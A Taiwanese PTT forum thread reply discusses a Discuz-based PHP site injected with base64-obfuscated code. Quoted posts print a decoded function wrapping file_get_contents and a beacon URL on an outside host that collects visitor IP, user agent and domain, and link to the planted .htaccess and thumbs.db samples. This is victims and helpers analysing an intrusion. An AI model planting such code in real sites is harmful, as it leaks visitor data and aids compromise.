Re: [請益] php 網站被植入密文 base64_decode
經過了這陣子的煎熬
我大概能夠猜到 他是利用 discuz 的 sql漏洞 搞出來的結果
更新後..現在應該解決了...
再試看看會不會發生這樣的問題吧...
※ 引述《kidbaby (幸福的進行式)》之銘言:
: ※ 引述《mervynW (.)》之銘言:
: : 先解到這邊. 建議你. passwd 全換一換吧
: : function evaloPoIEXQacJTquN($s) {return @file_get_contents($s);}
: : 他老兄要抓你的local file 都沒問題啦.
: : DB 應該也被趴走了吧 (茶)
: : 要找這種code最快的就是從 eval replace echo.
: : cp 2~3次就可以看到他的code了.
: : eval 拿掉也沒辦法執行 (茶), 所以變無害的 code
: : 解到最後, 這傢伙還沒那麼壞嘛.
: : file_get_contents ::
: : http://cacacacacacacacacaca.ca/in.php?
: : i=CLIENT_IP
: : &b=USER_AGENT
: : &h=DOMAIN_NAME
: : 最終結果是,知道你網站流量,分析你網站值不值的攻擊
: 太慘了 ...........................
: 我有些私密的東西放在這個網域裡面的儲存裝置 (不是在這個server) 慘慘慘
: 我大概說明一下
: 我的網站是
: 中華電信 50m/5m
: 硬體 i5-2400 + ASRock h67m-itx + 4G*2 ddr3 + Intel SSD x25-m G2 34nm 80G.
: windows 7 旗艦版 + Appserv v2.5.10 架的
: 在www目錄下被放置 .htaccess 跟 thumbs.db 兩個檔案 時間是 2011/8/9號上午12:04分
: 可是我上一次更動上面三個網站的東西 應該都在8/9之前
: 看樣子不像是掛了什麼模組內藏了這兩個檔案被偷放
: 所以我完全不了解他什麼時候放的
: 這台電腦也沒有掛ftp (不過別台有)
: 他到底是怎麼放的呢....
: http://dl.dropbox.com/u/12118398/Thumbs222.zip
: 我把這兩個檔案放出來 看看有沒有高手能完全解譯他...囧
: 這下真的囧了.........
: 真的沒偷抓檔案嗎....@@
: 還是偷抓我網芳的檔案....? 那我就完了...= ="
--
<囧>" 打擊~
■
ㄥㄥ
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 114.32.247.164
→
10/18 02:23, , 1F
10/18 02:23, 1F
→
10/18 10:17, , 2F
10/18 10:17, 2F
→
10/18 10:21, , 3F
10/18 10:21, 3F
推
10/18 10:29, , 4F
10/18 10:29, 4F
→
10/18 11:34, , 5F
10/18 11:34, 5F
→
10/18 11:35, , 6F
10/18 11:35, 6F
→
10/18 12:16, , 7F
10/18 12:16, 7F
→
10/18 13:07, , 8F
10/18 13:07, 8F
推
10/18 13:20, , 9F
10/18 13:20, 9F
→
10/18 13:21, , 10F
10/18 13:21, 10F
→
10/18 13:41, , 11F
10/18 13:41, 11F
推
10/18 14:11, , 12F
10/18 14:11, 12F
→
10/24 23:49, , 13F
10/24 23:49, 13F
討論串 (同標題文章)
本文引述了以下文章的的內容:
完整討論串 (本文為第 5 之 5 篇):